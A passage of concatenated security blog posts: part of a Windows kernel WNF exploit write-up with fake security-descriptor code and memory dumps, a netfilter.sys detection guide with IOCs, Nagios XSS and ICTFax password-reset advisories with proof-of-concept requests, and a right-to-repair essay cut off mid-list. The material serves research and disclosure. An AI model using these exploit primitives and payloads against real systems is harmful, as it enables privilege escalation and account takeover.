    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0xc [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x0 [Type: void *]
    [+0x018] Sacl             : 0x0 [Type: _ACL *]
    [+0x020] Dacl             : 0x23ee3ab4350 [Type: _ACL *]

I then attempted to provide a fake security descriptor with the same values. This didn’t work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790).

Ok then! Let’s just make the DACL NULL, so that the Everyone group has Full Control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
sd->Revision = 0x1;
sd->Sbz1 = 0;
sd->Control = 0x800c;     // SE_SELF_RELATIVE | SE_DACL_DEFAULTED | SE_DACL_PRESENT
sd->Owner = 0;
sd->Group = (PSID)0;
sd->Sacl = (PACL)0;
sd->Dacl = (PACL)0;       // NULL DACL: everyone is granted full access

EPROCESS Corruption

Initially when testing out the arbitrary write, I was expecting that setting the StateData pointer to 0x6161616161616161 would result in a kernel crash near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, this is caught and the NT status -1073741819 (STATUS_ACCESS_VIOLATION) is propagated back to userland. This made initial debugging more challenging, as the code around that function was a significantly hot path and using conditional breakpoints led to a huge program standstill.

Anyhow, after achieving an arbitrary write an attacker will typically leverage it either to perform a data-only privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.

To recap, the following steps needed to be taken:

1) The internal StateName needs to match up with the external StateName used, so that the corrupted _WNF_NAME_INSTANCE can be looked up when required.
2) The security descriptor needs to pass the checks in ExpWnfCheckCallerAccess.
3) The offsets of DataSize and AllocatedSize need to be appropriate for the area of memory targeted.

So in summary we have the following memory layout after the overflow has occurred and the EPROCESS being treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

PROCESS ffff8881dc84e0c0
    SessionId: 1  Cid: 13fc    Peb: c2bb940000  ParentCid: 1184
    DirBase: 4444444444444444  ObjectTable: ffffc7843a65c500  HandleCount:  39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1  Cid: 073c    Peb: f143966000  ParentCid: 13fc
    DirBase: 135d92000  ObjectTable: ffffc7843a65ba40  HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0  Cid: 0448    Peb: 825b82f000  ParentCid: 028c
    DirBase: 37daf000  ObjectTable: ffffc7843ec49100  HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffffd68c
   +0x008 DataSize         : 0x100
   +0x00c ChangeStamp      : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0  00000003 00000000 dc84e0c8 ffff8881  ................
ffff8881`dc84e0d0  00000100 41414142 44444444 44444444  ....BAAADDDDDDDD
ffff8881`dc84e0e0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e100  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e110  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e120  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e130  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e140  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e150  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e160  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e170  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e180  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e190  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0  44444444 44444444 00000000 00000000  DDDDDDDD........
ffff8881`dc84e1e0  00000000 00000000 00000000 00000000  ................
ffff8881`dc84e1f0  00000000 00000000 00000000 00000000  ................

As you can see, EPROCESS+0x8 has been corrupted with attacker controlled data.

At this point typical approaches would be to either:

1) Target the KTHREAD structure’s PreviousMode member

2) Target the EPROCESS token

These approaches and their pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

In summary, we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitives. That is all for now in part 1! In the next blog I will cover reliability improvements, kernel memory clean-up and the continuation of the exploit.

Detecting and Hunting for the Malicious NetFilter Driver

16 July 2021 at 21:26

Category:  Detection and Threat Hunting

Overview

During the week of June 21st, 2021, information security researchers from G Data discovered that a driver for Microsoft Windows named “netfilter.sys” had a backdoor added by a 3rd party, which Microsoft had then signed as a part of the Microsoft OEM program. The malicious file is installed on a victim’s system as a component of an attack during the post-exploitation process. This means that the attacker must either have gained administrative privileges or already had access to run the installer that updates the registry and installs the malicious driver; this can occur during post-exploitation, or the driver can be set up to install the next time the system starts. Additionally, the victim can be convinced to install the driver as part of a pretexting attack. At present, Microsoft has not seen the enterprise environment targeted; rather, individual users appear to be the targets.

The following details are provided to assist organizations in detecting and threat hunting for this specific threat and other similar types of threats.

Investigating Malicious Drivers

Several tools can be used to check systems for indications of malicious drivers. For example, tools such as SysInternals Autoruns and LOG-MD can investigate autoruns or persistence entries, with drivers being one type of persistence on Windows server and workstation systems.

On a Windows system, drivers are typically loaded from three locations:

  • C:\Windows\System32\Drivers
  • C:\WINDOWS\system32\DriverStore\FileRepository
  • An application’s installation directory, typically under “Program Files” or “Program Files (x86)”.

The malicious netfilter driver, in this case, can be found in a folder in which drivers should never exist. The odd driver location is a good artifact for execution detection and threat hunting. Any binary found in the following folder should be investigated:

  • %AppData% – C:\Users\<username>\AppData\Roaming

Windows also provides a built-in utility “driverquery” that can list the drivers, the state of the driver (running or stopped), and the driver’s key (location from which the driver was loaded).  To get a list of all the drivers of a system into CSV format that can then be opened in Microsoft Excel, execute the following command in an administrative command prompt:

  • driverquery /v /fo CSV | find /i /v "system32\drivers\" | find /i /v "driverstore" > C:\Windows\Temp\Driver_List_%computername%.csv

This command will filter out the two primary locations drivers are loaded, providing a short list of drivers on the system that should be investigated.  This command also includes the name of the system appended to the output filename to allow for easier review of artifacts collected from multiple systems.

Detection

Detecting the netfilter driver and similar malicious payloads is as simple as looking for binaries and drivers loaded from atypical locations. Add a rule to your SIEM, log management, EDR, or similar security tooling that looks for process execution (event ID 4688 of the Windows security log) from the following locations:

  • C:\Program Files
  • C:\Program Files (x86)
  • C:\ProgramData
  • %AppData% – C:\Users\<username>\AppData\Roaming
  • %LocalAppData% – C:\Users\<username>\AppData\Local

In order to collect event ID 4688, the Windows Advanced Audit Policy will need to have the following policy enabled:

  • Detailed Tracking – Audit Process Creation

We hope this information can assist in your detection and threat hunting efforts to detect this and similar types of attacks.

IOCs

The following indicators of compromise (IOCs) are provided to help in detection and threat hunting activities.

Folders in which the file(s) can be found

  • %AppData% – C:\Users\<username>\AppData\Roaming

Filenames

  • Netfilter.sys
  • Sdl.sys
  • File.sys

IP Addresses

  • 110.42.4[.]180
  • 45.113.202[.]180

File Hashes

  • 04a269dd0a03e32e5b2a1c8ab0768791962e040d080d44dc44dab01dd7954f2b
  • 0856a1da15b2b3e8999bf9fc51bbdedd4051e21fab1302e2ce766180b4931d86
  • 0c42fe45ffa9a9c36c87a7f01510a077da6340ffd86bf8509f02c6939da133c5
  • 0eace788e09c8d3f793a1fad94d35bcfd233f0777873412cd0c8172865562eec
  • 115034373fc0ec8f75fb075b7a7011b603259ecc0aca271445e559b5404a1406
  • 12656fc113b178fa3e6bfffc6473897766c44120082483eb8059ebff29b5d2df
  • 12c0002af719c6abbc1e726b409fce099fffb90f758477f5295c152bde504caa
  • 16b6be03495a4f4cf394194566bb02061fba2256cc04dcbde5aa6a17e41b7650
  • 18b923b169b2c3c7db5cbfda0db0999f04adb2cf6c917e5b1fb2ff04714ecac1
  • 1aa8ba45f9524847e2a36c0dc6fd80162923e88dc1be217dde2fb5894c65ff43
  • 1cd75de5f54b799b60789696587b56a4a793cf60775b81f236f0e65189d863af
  • 1d1f7e26109e6cb28c6b369c937b407d7b0cce3c4800ce9852eda94742b12259
  • 1d60819f0ab8547dcd4eb18d39a0c317ec826332afa19c0a6af94bc681a21f14
  • 1f05f74ebae7e65d389703d423445ffb269e657d8278b0523417e1f72b0228eb
  • 1f90d9c4d259c1fde4c7bb66a95d71ea0122e4dfb75883a6cb17b5c80ce6d18a
  • 22da5a055b7b17c69def9f5af54e257c751507e7b6b9a835fcf6245ab90ae750
  • 22f6fe6bd62fb03f7aee489cccbc918999f49596052ac0153c02cd7a3320de13
  • 23c061933d471c1f959c77806098ec0528d9b1d0130689bb3f417dd843138468
  • 24ea733bae1b8722841fb4c6cead93c4c4f0b1248ca9a21601b1ce6b95b06864
  • 26d67d479dafe6b33c980bd1eed0b6d749f43d05d001c5dcaaf5fcddb9b899fe
  • 26f2b9cf6e0fb50bad49a367bee63e808f1d53c476b38642d13c7db6e50687f4
  • 2fa78c2988f9580b0c18822b117d065fb419f9c476f4cfa43925ba6cd2dffac3
  • 314affdc86f62c8f8069ccd50a2cdf73bcd319773a031be700ba97a1ea4129a8
  • 34c890fa43ca0e5165a4960549828ba43d7f48a216a22fc46204548ebfc34f72
  • 3700b38d63d426ff0a985226b45eca6e24d052f4262d12aff529e62c2cb889c3
  • 40c45c9b1c764777096b59f99ae524cbd25b88c805187e615c3ed6840f3d4c15
  • 45ee083e28fbb33afa41b1b8cd00d94c29dea8cb7cee70bae4079e6c3dfb5501
  • 4ce61ad21f186cf10dbcc253feee31262203cb5c12c5a140d2dda5447c57aba1
  • 516159871730b18c2bddedb1a9da110577112d4835606ee79bb80e7a58784a13
  • 5cb1dc26159c6700d6cadece63f6defda642ec1a6d324daefb0965b4e3746f70
  • 5d0d5373c5e52c4405f4bd963413e6ef3490b7c4c919ec2d4e3fb92e91f397a0
  • 62d7c5465852cdb7b59a86c20b4de5991c8f4820ce11a7c01cf0dde6032e500d
  • 630d7bdc20f33e6f822f52533a324865694886b7b74dfaad1dc30c9aee4260a2
  • 635273eaa4c2e20c4ec320c6c8447ce2e881984e97c9ed6aeec4fad16b934e81
  • 63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0
  • 640eeb3128ae5c353034ee29cb656d38c41353743396c1c936afd4d04a782087
  • 6703400b490b35bcde6e41ce1640920251855e6d94171170ae7ea22cdd0938c0
  • 6a234a2b8eb3844f7b5831ee048f88e8a76e9d38e753cc82f61b234c79fe1660
  • 6a6db5febdaf3f1577bf97c6e1e24913e6c78b134062c02fd1f9875099c03a3f
  • 6c7f24d8ed000bc7ce842e4875b467f9de1626436e051bd351adf1f6f8bbacf8
  • 70b63dfc3ed2b89a4eb8a0aa6c26885f460e5686d21c9d32413df0cdc5f962c7
  • 79e7165e626c7bde546cd1bea4b9ec206de8bed7821479856bdb0a2adc3e3617
  • 7ff8fe4c220cf6416984b70a7e272006a018e5662da3cedc2a88efeb6411b4a4
  • 8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870
  • 8e0b330a8df3076153638f5b76afc24d1083ebccc60e4d63ee0df5c11c45d58a
  • 93d99a5fbfc888c0a40a18946933121ae110229dcf206b4d17116a57e7cf4dc9
  • 97030f3c81906334429afebbf365a89b66804ed890cd74038815ca18823d626c
  • 9b55b35284346bbcdc2754e60517e1702f0286770a080ee6ff3e7eed1cab812a
  • 9f9315790d0b0cc5213ac9a8eff0968cccc0a6c469b50d6598ce759748fe74bf
  • 9f9ebd6cd9b5b33ab2780122ee9c5feec84927f362890a062d13ef9816c7b85f
  • a0050c33c8263da02618872d642617959b3564fe173985e078bfedb89df93724
  • aa97f4f98ff842b1bfd78e920fcb1dedaec3f882dd19311bba6037430868e7a7
  • ad2dd8a68ce22d0959f341e9269e8033b34362b34bdea50b8ee2390907f1a610
  • b2cd9cca011064d03ddd8fe3521ce0e9f9d8b16f63e4ecaf03eacfef47d22dbf
  • b7516dca419d087ef844c42e061a834908f34e7363577ab128094973896222c8
  • b847e717215e0198cb4e863bd96390613f83eb92693171be50ca14255c5fb088
  • bbc58fd69ce5fed6691dd8d2084e9b728add808ffd5ea8b42ac284b686f77d9a
  • bfb4603902c6c9ff32bc36113280ee8b5687cc3ef4c0ff9fc56f2925c7f342f0
  • c0e74f565237c32989cb81234f4b5ad85f9dd731c112847c0a143d771021cb99
  • c2f23ad4e2f12c490cfd589764464e293d5d56c31b6b3f5081e2d677384cb2fe
  • c95af9eb52111b72563875d85d593d96d7e54e19690827a052377c77cc80e06f
  • caa0d9bb7ed2d21a76b71dfc22ffaef80371de8af2a03b8103cbcec332897a88
  • d0e1639e6386ef3c063bfae334fcc35cdfa85068ac1a65bb58f2463276c31ac9
  • d1ac4d07ba6fe1dd988c471975e49e35b83d03a9b9d626fa524fd8300b80b14a
  • d4335f4189240a3bcafa05fab01f0707cc8e3dd7a2998af734c24916d9e37ca8
  • d60fdabaf5a0ab375361d2ed1a9b39832bdb8bd33466d6c43d42a48ba2ffd274
  • e0afb8b937a5907fbe55a1d1cc7574e9304007ef33fa80ff3896e997a1beaf37
  • e2449ccc74e745c0339850064313bdd8dc0eff17b3a4e0882184c9576ac93a89
  • e8e7f2f889948fd977b5941e6897921da28c8898a9ca1379816d9f3fa9bc40ff
  • edc6e32e3545f859e5b49ece1cabd13623122c1f03a2f7454a61034b3ff577ed
  • ee6d0d0ea24be622521ee1a4defa5d5729b99ee2217ac65701d38d05dbc0d4e6
  • f1718a005232d1261894b798a60c73d971416359b70d0e545d7e7a40ed742b71
  • f83c357106a7d1d055b5cb75c8414aa3219354deb16ae9ee7efe8ee4c8c670ca
  • fd8a5313bf63f5013dc126620276fb4f0ef26416db48ee88cbaaca4029df1d73

Additional Reading

Technical Advisory: Stored and Reflected XSS Vulnerability in Nagios Log Server (CVE-2021-35478,CVE-2021-35479)

22 July 2021 at 05:35
Vendor: Nagios
Vendor URL: https://www.nagios.com/
Versions affected: 2.1.8
Systems Affected: Nagios Log Server
Author: Liew Hock Lai <[email protected]>
Advisory URL: https://www.nagios.com/downloads/nagios-log-server/change-log/ 
CVE Identifier: CVE-2021-35478 (Reflected XSS), CVE-2021-35479 (Stored XSS)
Risk: 4.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N) (client-side script execution)

Summary

Nagios Log Server is a Centralized Log Management, Monitoring, and Analysis software that allows organizations to monitor, manage, visualize, archive, analyse, and alert on all of their log data. Version 2.1.8 of the application was found to be vulnerable to Stored and Reflected XSS.

This occurs when malicious JavaScript or HTML code entered as input to a web application is stored within back-end systems, and that code is later used in a dynamically-generated web page without being correctly HTML-encoded.

Impact

The XSS could allow attackers to execute malicious JavaScript in victims’ browsers, for example to steal cookies or redirect users.

Details

Reflected XSS

The time, start, end, type and search parameters in the audit log and alert history pages are vulnerable to Reflected XSS.

An example URL of the vulnerable page is the following:

GET /nagioslogserver/admin/audit-log?time=24h&start=&end=&type=&search= HTTP/1.1

As a proof of concept, an alert box can be generated with the following payload:

GET /nagioslogserver/admin/audit-log?time=24h"><script>alert(1)</script>&start=&end=&type=&search= HTTP/1.1

Proof of concept:

Stored XSS

The pp parameter (results per page) in the audit log and alert history pages is vulnerable to Stored XSS.

An example URL of the vulnerable page is the following:

POST /nagioslogserver/admin/audit-log HTTP/1.1

As a proof of concept, an alert box can be shown with the following payload:

POST /nagioslogserver/admin/audit-log HTTP/1.1

Host: 192.168.1.223
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://192.168.1.223
Connection: close
Referer: http://192.168.1.223/nagioslogserver/admin/audit-log
Cookie: csrf_ls=b782f760bdac44ce7471725aac3882e2; ls_session=c4tv62aqvq8deo92lmalloule04bob2i
Upgrade-Insecure-Requests: 1

csrf_ls=b782f760bdac44ce7471725aac3882e2&pp=1"><script>alert(1)</script>

Proof of concept

Recommendation

Upgrade to Nagios Log Server 2.1.9.

Vendor Communication

2021-06-19 Advisory reported to Nagios
2021-06-21 Nagios received and started to track the security vulnerabilities
2021-06-24 Nagios fixed the issue on version 2.1.9
2021-07-20 Nagios released the patch
2021-07-22 Technical Advisory published by NCC Group 

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: 22 July 2021

Written by:  Liew Hock Lai

Technical Advisory – ICTFAX 7-4 – Indirect Object Reference

22 July 2021 at 22:15
Vendor: ICTFAX
Vendor URL: https://www.ictfax.org
Versions affected: ICTFax Version 4.0.2
Author: Derek Stoeckenius

Summary

ICTFax is fax-to-email software maintained by ICT Innovations. In version 7-4 of this product, available through the CentOS software repository, an indirect object reference allows a user of any privilege level to change the password of any other user within the application – including administrators.

Impact

Successful exploitation of this vulnerability can allow a low-privilege user to access both administrative functions and user data from arbitrary users within the application.

Details

The application does not require the user to re-enter their current password in order to change passwords, and it uses sequential numbering to refer to users for the purposes of altering passwords.

To replicate this issue:

1. Log in to the application as a “user”

2. Replace the [bearer token] with a valid token from an authenticated user

3. Alter the [usernumber] field to a valid numerical user within the application. 

Recommendation

ICTFax should require that a user re-enter their password before making password changes within the application.

Vendor Communication

4/12/21 NCC Group made initial contact with ICT Innovations via their ticket system
4/13/21 Ticket assigned
4/16/21 NCC Group requested that communication continues via secure comms
4/23/21 ICT Innovations response asking NCC to email a head developer
4/27/21 NCC emails the head developer letting them know we would like to start a disclosure
5/1/21 No response from ICT Innovations so NCC opens up the original ticket requesting direction from ICT Innovations
6/1/21 No response from the ticket system so NCC reaches out to the head developer again explaining that NCC would like to start a disclosure, citing our disclosure policy 
7/7/21 NCC reaches out to ICT Innovations via email and their ticketing system, and informs them that we intend to publish the advisory on our blog in one week 
7/22/21 Advisory published

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  July 22 2021
Written by: Derek Stoeckenius

Practical Considerations of Right-to-Repair Legislation

23 July 2021 at 15:02

Background

For some time there has been a growing movement amongst consumers who wish to repair their own devices in a cost effective manner, motivated to reduce their expenses, and reduce e-waste. This is becoming ever more difficult to achieve as devices reach ever higher levels of complexity, and include more electronics and firmware. The difficulty is exacerbated when OEMs make the information, parts, and tools necessary for repairs only available to their own authorized repair centers, policies which have been described as predatory.

Fundamentally, much of the conflict appears to arise from the distinction between the distribution models of traditional goods and digital goods. Historically, if you buy an item like a car you are free to do with it what you like, including re-selling, repairing with original or after-market parts, and generally modifying as you see fit. For digital goods like software this is not typically the case. Instead the purchaser will only acquire a license to use the software rather than any ownership stake that would permit them the same capabilities as a traditional purchase. The line between these cases has now become very blurred as much of what we buy contains computers and software. So while you may own your modern car or smartphone, the many millions of lines of code within it you almost certainly do not.

There have been several prominent cases at the forefront of the debates that are worth mentioning for additional context.

  • John Deere, a popular manufacturer of farming equipment, has been in a battle against farmers who want tools and software to be made available so that they can repair their own machines without expensive service calls.
  • Apple similarly makes authorized repairs only available at their own (often inconveniently located) stores and has repeatedly lobbied against right to repair legislation. 
  • McDonald’s too is embroiled in a scandal where they’re preventing franchisees from using 3rd party diagnostic tools to keep the ice cream machines in working order, which is an expensive challenge preventing 5-16% of all McDonald’s restaurants from selling ice cream at any given time. 

Owner Perspective

The benefit to owners is somewhat obvious. Being able to repair their devices allows them to save money, to learn how the technology works, to innovate new uses for things, and gives them freedom of choice. The cost of repairs when using name brand repair shops has always been much higher than the independent shops. This is a long established truth most evident in the auto repair industry. We see this mirrored in other industries, as anyone who’s had to fix a broken iPhone can attest. The ability to modify a system has been a crucial part of the story of innovation. So many of our modern gadgets owe their existence to the improvements built upon the previous generations of technologies.

OEM Perspective

Depending on the industry and the device, repair services can account for a significant portion of the OEM’s revenue. While Apple claims to actually lose money on iPhone repairs, about half of the US automotive market’s $1.2 trillion revenue is generated from aftermarket part sales. Other industries and other OEMs will fall somewhere on this profitability spectrum. But while profit can be an important factor in restricting repair capabilities, it’s not the only one.

Most OEMs correctly take their responsibility for the security of their users very seriously. This is not only good business, it’s a legal requirement, and failing to protect the security of user devices can bring very serious penalties. To that end, OEMs implement a plethora of security features in their devices that are intended to lock out would-be attackers. Attackers come in many varieties, from the opportunistic, who scan the Internet for vulnerable systems, to the very targeted, who may attempt to compromise a device physically. In some cases, the user themselves is considered an attacker, as is the case for most entertainment devices. Here, the content providers are a stakeholder in the device security story and contractually require that their assets be protected from the users.

Finally, modern devices are rarely built and put to market without an extensive array of technology suppliers. Frequently an OEM has supply arrangements that are bound by highly restrictive contract terms which may prevent the public disclosure of the vendor’s intellectual property. This can include source code, reference schematics, datasheets, software tools, and other information that may be necessary for the effective repair of some types of defects. The OEM may simply not have the legal rights to release the required information.

US Federal Legislation

In the US, and around the world, various governments have proposed (largely unsuccessful) legislation to address the repair controversy. Various states have also attempted unsuccessfully to introduce similar legislation in the past. Most recently, a US presidential executive order was issued tasking the FTC with enacting new rules for OEMs in this regard. At about the same time, a new bill was introduced to congress with the same purpose, the text of which is now available as the Fair Repair Act. Over the coming days and weeks there will be a significant amount of ink given to interpreting the recently published text. The key highlights of the proposed legislation include the following:

  • (Section 2.a) Electronic OEMs must make documentation, parts, and tools available for owners and independent repair providers. This includes making firmware available for public download. 
  • (Section 5.3) Also included is “reporting output” which is not defined in the text. We assume this means logs or similar, which may contain sensitive information.
  • (Section 5.5) The OEM must make these materials available under timely and reasonable terms. Reasonable terms must not include substantial obligation or restrictions.
  • (Section 3) Enforcement will be delegated to the FTC, and any FTC actions and intervention will take priority over possible actions by lower levels of government.
  • (Section 4.1) Security related functions are explicitly not excluded.
  • (Section 4.2) If trade secrets need to be divulged to comply, then so be it.
  • The proposal explicitly does not apply to:
    • (Section 4.4) motor vehicles (a term not defined in the text, but from other documents we conclude that tractors and farm machinery ARE covered by the rules)
    • (Section 4.5) medical devices (already subject to FDA definitions and regulation).
  • (Section 5.4, 5.6) Embedded software is defined as “programmable instructions”, but this itself is vague and undefined and warrants further discussion.
  • (Section 5.12) Tools may include software.
  • (Section 6) If passed, this legislation takes effect in 60 days.

Implementation Thoughts

Device security is a balancing act. There are often trade-offs and compromises with usability, performance, cost, and of course repairability. Here we discuss some specific implications of the proposed legislation and how an OEM might alter their designs to comply.

Minimum Repairable Unit

The biggest question that remains unanswered in the legislation text, is what the minimum repairable unit should be. Swapping out an entire ECU module on a tractor is a straightforward repair for pretty much anyone with the right screwdriver. But what about deeper levels of granularity? Can single components within the ECU be replaced? What about fixes deep within a semiconductor device? What about software bugs? Obviously all of this can be fixed by the owners with the right tools, skills, and instructions, but how deep into the technology stack will the legislation apply? In the extreme, consider that a modern CPU can contain thousands of internal computing elements all of which contain firmware that theoretically contain bugs to be repaired. Will the legislation require releasing the details of every transistor in the chip? This uncertainty is likely driving a lot of the resistance we see from the OEMs.

A layman’s interpretation of the legislation is that the minimum repairable unit is below the PCB level. Schematics are explicitly included in the list of information OEMs must provide, and so one would assume that users may be permitted to diagnose which component on the PCB has failed and replace it. For now it seems that the OEMs are left to interpret where they will draw the line for what is and is not repairable, and security must now be part of that discussion more than ever.

Security Mechanisms

There are certainly security features within devices that are intended to prevent attackers from compromising the device, its data, or its users. Each security mechanism that could be an obstacle for repair needs to be evaluated on a case-by-case basis to determine the best course of action for compliance.

Section 4.1 is interesting in its vagueness. One would assume that this is intended to address cases where passwords or authentication tokens are needed in order to conduct the repairs and bring the device back to a functional state. But additionally we should assume this is intended to address cases where security functionality intended to protect the device from attackers may prevent certain repairs, as exemplified by the iPhone button replacement situation from 2016 that caused devices repaired with third party buttons to stop functioning.

As one specific example, secure devices often will use a secure device identity that is represented as a combination of the components within the device. Information from each security impacting component is collected and cryptographically combined to create a value that represents the sum of all the parts. This value is cryptographically signed by the OEM (using a signing server or signing oracle) at manufacturing time to ensure that it cannot be tampered with by an attacker seeking to subvert the security of one or more components that may be vital to the security of the overall device. This signed value is then used for things like device identity, encryption of secrets, and other foundational security functionality. Any material change in the makeup of the security related components of the device will invalidate this value or its signature, and thus be detectable (most likely manifesting as an early boot failure). To allow authorized replacement of a component in a system such as this requires that the original pairing operation be performed again, along with the signing step. Because the signature generation is a security sensitive operation, only authorized users would typically be granted such permissions in order to prevent abuse by attacking user devices, creating counterfeits, and laundering stolen devices. 

Under the proposed rules, such a signing oracle would need to be made available to owners and independent repair operators, which may then enable the very attacks that the system was designed to prevent. Section 4.1 clearly covers such functionality, which may result in a significant degradation of device security if implemented poorly.

A reasonable (but unfortunately uncommon) approach here is to perform a two stage authentication, where both the OEM and the owner are required to authorize the bypass of the security mechanism. This allows neither party to bypass without the other’s approval. The caveat here is that as an industry we have yet to find a reliable way to support owner authentication that does not allow (or even encourage) poor security practices such as default or weak passwords.

Secure Boot

Software and firmware are listed in the proposed legislation, but described simply as “programmable instructions”. It is unclear if this affects all programmable instructions within the device, all the way down to the many embedded ROMs within the silicon, or if the line will be drawn at the firmware (which is specifically mentioned). Furthermore, it is unclear if the intent is to allow the owner source code access such that they may fix software bugs, or merely binary images so they can reflash devices with the original OEM provided code. The latter is relatively common already, as any mature and responsible OEM is already making ongoing firmware updates available to provide security patches for connected devices. The former, on the other hand, comes with additional complications. Most firmware integrity measures, such as secure boot, rely on cryptographic signatures applied to the firmware image. Verification of the signature at boot time prevents attackers from persistently compromising the device. Such features have been seen for more than 2 decades in smartphones, and are now considered a table-stakes defense for any modern connected device. The complication here is that the cryptographic signature is only useful if the private key remains secret. If owners are expected to be able to modify the firmware then the key will need to be shared, revealing it to attackers, and thus eliminating this important security defense entirely. It is unclear if Section 4.1 (security functions) and 4.2 (trade secrets) of the proposed legislation are intended to cover this particular case, but a conservative reading should probably assume they do. Two possible implementation solutions to this are:

  1. Provide unique signing keys for each individual device, and an authorization system that permits only the current owner of a system to access or use these private keys. This is a level of infrastructure burden many OEMs today are not likely prepared for.
  2. Allow the owner to provide their own signing key. Emerging proposals exist (OCP, IBM) in some domains to allow the cryptographic transfer of ownership by replacing the signing key in a system with one of the owner’s choosing. Hardware support for this is rare, but does exist in some components. Unofficial partial support in Android also exists.

Neither solution above is commonly implemented today and would require extensive changes deep within the system, requiring new hardware and firmware to be designed and tested. Bound by dependencies in current hardware and semiconductor designs, it is doubtful that such changes could be rolled out within the proposed 60-day implementation deadline.

Authentication

The difficulty for OEMs here is best illustrated by a concrete example: All phones contain a unique identifier that allows the network to address them individually. For phones on 3GPP networks this is the International Mobile Equipment Identity (IMEI). The IMEI is programmed by the OEM during manufacturing, and is typically allocated on a per network carrier basis. Repurposing phones from one carrier to another (during repair, or manufacturing rework) may require replacing the IMEI, and such functionality is therefore a practical necessity that OEMs implement for their own internal use. But because it is illegal to alter the IMEI in some jurisdictions, this repair functionality is tightly restricted to only OEM authorized individuals. 

There are many examples of similar functionality where through regulation, contractual obligations, liability, safety, security, etc, certain privileged functionality cannot be exposed to users or owners. From this standpoint, the proposed legislation will necessarily create multiple tiers of authorized repair. Some OEMs implement this sort of granular authentication capability already, separating permissions for internal OEM development, internal manufacturing, external repair, and owner capabilities, but this is not a common feature. Implementing the core firmware functionality and the infrastructure necessary to support it is non-trivial, and unlikely to meet the proposed 60 day implementation deadline.

End of Life

End of life is a challenge as recent public cases highlight. A vulnerability in a Western Digital product is a case study of what happens when internet connected products continue to be used past EOL. SonicWall had a similar incident recently as well.

Attacker techniques and tools improve over time. As software ages, ever more vulnerabilities will be discovered in it. The standard practice is therefore to continually release updated software and firmware versions, preferably at a regular cadence. Automatic updates remove the need for owners to be involved in this vital (but tedious) maintenance, and is thus becoming a common feature in many devices.

In the WD case, they had previously declared the product model as EOL in 2015 and have provided no firmware updates to patch known vulnerabilities since that time. There were multiple critical vulnerabilities including remote root command injection and a remote unauthenticated factory reset function. The latter is being actively exploited in the wild to destroy customer data, leaving WD in an uncomfortable position. 

What happens when the product is no longer commercially viable for the OEM to support? It may still have decades of useful life, and thus support is clearly needed. For consumer devices the most common relationship model is that the customer pays a single up front cost, and the vendor provides binary-only firmware updates for free, for a time. Under this model, obviously it’s impractical for a company to support products in the field forever, and the customer is incapable of providing their own patches. This leaves a few options:

  1. Offer customers a support plan, for example an annual subscription fee that funds the ongoing maintenance of the product and its firmware. Customers who depend on the product may be willing to pay. This support concept is well established for enterprise products already.
